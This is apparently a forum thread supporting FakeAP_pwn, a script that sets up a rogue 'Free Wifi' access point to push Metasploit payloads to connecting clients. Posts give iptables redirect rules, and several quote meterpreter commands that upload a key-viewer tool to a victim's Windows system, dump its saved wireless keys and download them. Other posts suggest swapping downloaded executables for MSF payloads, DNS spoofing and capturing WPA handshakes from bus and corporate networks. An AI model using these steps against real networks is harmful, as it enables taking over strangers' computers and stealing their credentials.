[Script] [Video] FakeAP_pwn (v0.2.1)

[nivong]

g0tmi1k
Even after the update = Still not working. eth0 is connected to my home wan. wlan0 is my wifi interface. Other boxes using to test include Windows 7 Ultimate & Windows Vista both with the firewalls and AV turned off for this test specifically. Like I said before the ssid "Free Wifi" shows just no connection is being made.
Any other ideas?

Guess I'll just have to go back to running the commands separately. ::sigh::

I recommend you download a fresh new backtrack, live CD and then run that one with this script, that should work

[joker5bb]

Fix:
IPTABLES -P INPUT ACCEPT
IPTABLES -P FORWARD ACCEPT
IPTABLES -P OUTPUT ACCEPT
iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1

[g0tmi1k]

g0tmi1k
Even after the update = Still not working. eth0 is connected to my home wan. wlan0 is my wifi interface. Other boxes using to test include Windows 7 Ultimate & Windows Vista both with the firewalls and AV turned off for this test specifically. Like I said before the ssid "Free Wifi" shows just no connection is being made.
Any other ideas?

Guess I'll just have to go back to running the commands separately. ::sigh::

Are you getting an IP?
Have you tired the advice below?

I recommend you download a fresh new backtrack, live CD and then run that one with this script, that should work

Thanks for the help!

Fix:
IPTABLES -P INPUT ACCEPT
IPTABLES -P FORWARD ACCEPT
IPTABLES -P OUTPUT ACCEPT
iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1

This work for you?

[parrotface]

Great script works well
Runs meterpreter scripts just great
How I downloaded the wireless keys from the client

meterpreter> upload /xxxx/xxx/wkv.exe wkv.exe
(this uploads to c:/WINDOWS/system32 )
meterpreter> run multicommand –c “c:\\WINDOWS\\system32\\wkv /stext wirecodes.txt”
(this saves wirecodes.txt to c:\\WINDOWS\\system32)
meterpreter> download c:\\WINDOWS\system32\\wirecodes.txt /tmp
now view the downloaded file

[g0tmi1k]

Great script works well
Runs meterpreter scripts just great
How I downloaded the wireless keys from the client

meterpreter> upload /xxxx/xxx/wkv.exe wkv.exe
(this uploads to c:/WINDOWS/system32 )
meterpreter> run multicommand –c “c:\\WINDOWS\\system32\\wkv /stext wirecodes.txt”
(this saves wirecodes.txt to c:\\WINDOWS\\system32)
meterpreter> download c:\\WINDOWS\system32\\wirecodes.txt /tmp
now view the downloaded file

Someone else did another script for this:
Wireless Key Harvester --- including video - Remote Exploit Forums
This script doesn't automate it, so you have to do it all yourself

Anyway, it looks like you ca upload, create and download the keys.
So your wanting help with viewing it?! :S
look in /tmp/! Use nano, vi , cat or kate to veiw the file!

[parrotface]

sorry I didn't make my self clear
I can view it NO problem using kwrite or less.
thanks for reply, Just tring to show others how I did it after months of trying
I have tried the script you suggest but I failed.
thanks again

[joker5bb]

add this to the top, to stop any current process

killall -9 airbase-ng dhcpd3 apache2 wicd-client
/etc/init.d/dhcp3-server stop
/etc/init.d/apache2 stop
/etc/init.d/wicd stop

this way we can easily re-run the script multiple times
wicd is killed to prevent channel hopping,

[opreat0r]

All that just to do MITM attack on open wifi !?
my short ugly hack : Replace *.EXE with MSF payload .. - Remote Exploit Forums

you can also look at 'mass client side attack' or file pwn or wifizoo karmetasploit you could also DNS spoof to at least have it look like MSN etc when downloading the update... list goes on and on

MSF meterpreter cheat sheet
http://www.rmccurdy.com/scripts/Meta...reference.html

[g0tmi1k]

sorry I didn't make my self clear
I can view it NO problem using kwrite or less.
thanks for reply, Just tring to show others how I did it after months of trying
I have tried the script you suggest but I failed.
thanks again

O. Thanks (=
Glad that it work for you!

add this to the top, to stop any current process

killall -9 airbase-ng dhcpd3 apache2 wicd-client
/etc/init.d/dhcp3-server stop
/etc/init.d/apache2 stop
/etc/init.d/wicd stop

this way we can easily re-run the script multiple times
wicd is killed to prevent channel hopping,

Thanks for the heads up, I'll try and get it in the next version.

All that just to do MITM attack on open wifi !?
my short ugly hack : Replace *.EXE with MSF payload .. - Remote Exploit Forums

you can also look at 'mass client side attack' or file pwn or wifizoo karmetasploit you could also DNS spoof to at least have it look like MSN etc when downloading the update... list goes on and on

MSF meterpreter cheat sheet
Metasploit meterpreter cheat sheet reference

opreat0r, as your using ettercap (which I don't like for the record), I’m guessing your posing the ARP. What if the target has ARP protection? Can’t posing due to the router/target ARP tables being protected/static/monitored? This is where this style of attack as its advantages, hence why I did “All that just to do MITM attack on open wifi”. Ettercap also doesn't create a network, it relies on an existing network, whereas this creates a new network, and we have full control over it.

I've seen and used FastTrack’s "mass client side attack". But I haven’t heard of "file pwn" (unless you mean replacing the exes with "our" exes). I've currently recorded videos for "WiFiZoo" & "karmetasploit" but haven't had the time to edit.
I know the list goes on! I just couldn’t be bothered to add it all in! Plus it’s harder to automate some of those programs, which was the idea of this script. And for the record, you could use Wireshark, and view all the data; I just chose those programs because of ease and automation/scripting.
I do like the idea of monitoring other traffic that isn’t on port 80, before they download the payload, and I'll see what I can do (if you have any other hints like this, please say! )

and thanks for the cheat sheet, but isn't scripting a little bit different?

[Gitsnik]

And to add to g0tmi1k's statement there, a fake AP lets you put out a "linksys" ssid and get everyone automatically connecting to it, connecting to someone else's AP doesn't help you much. You can also use this to intercept and half-crack WPA points from companies using WPA-PSK.

Or, if you're in my city, you can put out the bus AP SSID and watch them all dump onboard video data to you (no longer a possibility thankfully, but it illustrates my point nicely).